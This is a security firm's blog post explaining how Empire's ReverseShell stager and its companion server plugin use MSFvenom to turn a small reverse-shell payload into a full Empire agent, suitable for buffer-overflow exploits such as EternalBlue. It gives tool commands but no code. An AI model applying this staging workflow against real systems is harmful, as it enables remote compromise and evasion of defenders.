Empire

Today we wanted to cover one of the lesser-known functions in Empire, the ReverseShell stager. The name may not be as intuitive, so standby for a future name change, but this stager creates a minimal payload using MSFvenom to stage an Empire agent. Why would you need this? Well, in some instances, you need to have a payload that’s shellcode in the hundreds of kilobytes, but the best we can do for a standard Empire payload is just over a thousand, which isn’t small enough for some buffer overflow vulnerabilities we want to exploit. So let’s go through how we built this and what it does. For the walkthrough, we are using the Empire client, but Starkiller can also be used for all the steps.

ReverseShell Stager

The ReverseShell stager is generated in a similar method as other stagers. You go to the usestager menu and select the stager by using the command usestager windows/reverseshell. You will have to select all the normal fields for this, but most importantly, we added a spot for choosing the staging server (LocalHost and LocalPort). Even though these say they should be local, you can setup a separate server, but that is a bit outside the scope of this blog.

All MSF formats are supported for the output file, even though only a few are in the drop-down menu. So feel free to try out some of MSFvenom formats (C, PowerShell, etc) for your payloads. Just be sure to change the output file as an executable may not be the most helpful format.

Under the hood, the stager is simply generating a console command to send over to msfvenom to create a shell_reverse_tcp payload. If you are interested in the source code, you can check it out here.

ReverseShell Server Plugin

Now that we have a launcher generated, we will need to start up our staging server. The MSF payload is going to act as a Stage 0 (well, technically a Stage -1, but let’s just ignore that). The plugin is going to capture the ReverseShell from our MSFvenom payload and send back a PowerShell one-liner that will launch our Empire Agent. This part is a bit more complicated since it needs to be continuously listening. An alternative is you can do this all manually and have the call back to another machine and paste in a multi/launcher, but where is the fun in that?

The plugin is already pre-loaded into Empire so that you will use the command useplugin reverseshell_stager_server. The LocalHost and LocalPort should match the callback address that was used on the stager. Otherwise, it is set to listen on all interfaces by default. From this menu, you can generate a PowerShell agent with all the bypasses and obfuscation that you want since we are no longer limited on the size of our payload.

For those of you interested in the source code, check out the plugin here.

Success

Once the plugin is running, it will wait for the payload to be executed and send the Empire agent. If all things were configured properly, you should see the following message in your client and SUCCESS! You have an Empire agent using MSFvenom.

There are quite a few different uses for this type of stager, the most important being that it offers a way to create a minimally sized set of shellcode to use. We have used this type of payload in the past to create payloads to launch with Eternal Blue and SMBGhost. Hopefully, this blog helps out others trying to do development or stage payloads with some other CVEs you may want to use.

Our team is prepping a release of Empire 5.0, which will include some amazing new features and integrates Starkiller into your web browser. Currently, our Alpha is closed to Sponsors, but follow us on Twitter to see when the Open-Beta announcement happens.

If you enjoyed this walkthrough and want to learn more, we are offering an Evasion Course that will teach advanced techniques to defeat defenders at Blackhat USA 2022.

The post Empire <3 MSFvenom appeared first on BC Security.